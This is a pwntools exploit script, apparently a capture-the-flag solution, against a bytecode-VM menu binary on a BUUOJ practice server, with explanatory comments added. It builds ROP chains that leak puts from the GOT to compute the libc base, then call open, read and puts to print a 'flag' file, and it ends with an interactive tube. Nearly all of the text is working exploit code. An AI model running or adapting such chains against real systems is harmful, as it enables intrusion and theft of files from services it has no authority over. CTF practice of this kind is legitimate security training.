from
pwn
import
*
# pwntools settings: 64-bit Linux target, verbose tube logging.
context.update(os='linux', arch='amd64', log_level='debug')

# Remote practice instance and the local copy of the challenge binary.
r = remote("node3.buuoj.cn", 27223)
elf = ELF('./hh')   # loaded but never referenced in this script

# Fixed addresses inside the challenge binary.  They sit in the 0x400000
# range (apparently a non-PIE build), so every one of them is specific to
# this exact binary and would be invalidated by a relink or by PIE.
pop_rdi = 0x4011a3        # gadget; per its name "pop rdi ; ret" — confirm in disassembly
main = 0x401084           # not used below
buf = 0x602060            # address the chains below write a string into / read into
read = 0x400710           # presumably read@plt (same region as puts_plt) — confirm
pop_rsi_r15 = 0x4011a1    # gadget; per its name "pop rsi ; pop r15 ; ret" — confirm
puts_plt = 0x4006f0
puts_got = 0x601fa8
start = 0x400750          # return target at the end of every chain below
def code(cod):
    """Serialize a list of integers into the target's bytecode.

    Every entry is packed with pwntools ``p32`` (32-bit word, endianness taken
    from ``context``) and the words are concatenated in order.

    Args:
        cod: iterable of ints; each is expected to fit in 32 bits for ``p32``.

    Returns:
        bytes: the packed words, ``4 * len(cod)`` bytes long.
    """
    return b''.join(p32(word) for word in cod)
def stack(buf):
    """Encode 64-bit values as bytecode that writes them into consecutive slots.

    For the i-th value the emitted program is
    ``[9, low32, 12, 2*i + 1007, 9, high32, 12, 2*i + 1008]``: the qword is
    split into its low and high 32-bit halves and each half is paired with a
    slot number starting at 1007.  Opcode 9 presumably pushes the immediate
    and 12 stores it to the numbered slot — that is inferred from the layout;
    confirm against the challenge VM.  Only the encoding itself is established
    here.

    Args:
        buf: sequence of non-negative ints, each expected to be at most 64
            bits wide (the halves go through ``p32``).
            NOTE(review): this parameter shadows the module-level ``buf``
            address inside the function.

    Returns:
        bytes: the concatenated bytecode, one 8-word program per input value.
    """
    programs = []
    for index, qword in enumerate(buf):
        low_half = qword & 0xffffffff
        high_half = qword >> 32
        slot = index * 2 + 1007
        programs.append(code([9, low_half, 12, slot, 9, high_half, 12, slot + 1]))
    return b''.join(programs)
# Interaction with the remote menu.  Every round below relies on fixed
# addresses in the (apparently non-PIE) binary plus two hard-coded libc
# offsets; a different binary build, PIE, or a different libc would each
# break it, which is the mitigation picture to take from this script.


def _run_program(bytecode):
    """Drive one menu round: option 1 uploads ``bytecode``, option 2 runs it.

    "choice :" and "code:" are the remote program's prompts; the send/recv
    order is the protocol the service expects and must not be reordered.
    """
    r.recvuntil("choice :")
    r.sendline('1')
    r.recvuntil("code:")
    r.send(bytecode)
    r.recvuntil("choice :")
    r.sendline('2')


# Round 1: chain calls puts(puts_got) and returns to `start`, so the remote
# prints the address puts resolves to in its libc.
leak_chain = stack([pop_rdi, puts_got, puts_plt, start])
_run_program(leak_chain)
r.recv()
# The printed value is a line of raw address bytes; drop the trailing
# newline, zero-pad to 8 bytes and subtract the assumed offset of puts.
# 0x06f6a0 is presumably puts's offset in the remote libc build — the rest
# of the script is only valid if that build matches.
PUTS_LIBC_OFFSET = 0x06f6a0
leaked_line = r.recvline()[:-1]
libc_base = u64(leaked_line.ljust(8, b'\x00')) - PUTS_LIBC_OFFSET
log.info(hex(libc_base))
OPEN_LIBC_OFFSET = 0xF70F0   # presumably open's offset in the same libc
open_addr = libc_base + OPEN_LIBC_OFFSET

# Round 2: the program [6, 4, 0x67616c66, 0] is emitted first — 0x67616c66
# is "flag" as little-endian ASCII, followed by a 0 terminator.  Opcode 6
# presumably stores the immediate into slot 4 so the string lands at
# buf + 8 (confirm against the VM).  The chain then calls open(buf + 8, …)
# and returns to `start`; nothing in it sets rsi, so open's flags argument
# is not controlled here.
flag_name = code([6, 4, 0x67616c66, 0])
open_chain = stack([pop_rdi, buf + 8, open_addr, start])
_run_program(flag_name + open_chain)

# Round 3: read(3, buf + 0x500, …).  fd 3 is assumed to be the descriptor
# the previous open returned; the pop_rsi_r15 gadget (per its name) pops
# r15 as well, hence the 0 after the buffer address.  No gadget sets rdx.
read_chain = stack([pop_rdi, 3, pop_rsi_r15, buf + 0x500, 0, read, start])
_run_program(read_chain)

# Round 4: puts(buf + 0x500) prints whatever read() placed there, then the
# tube is handed to the operator.
print_chain = stack([pop_rdi, buf + 0x500, puts_plt, start])
_run_program(print_chain)
r.recv()
r.interactive()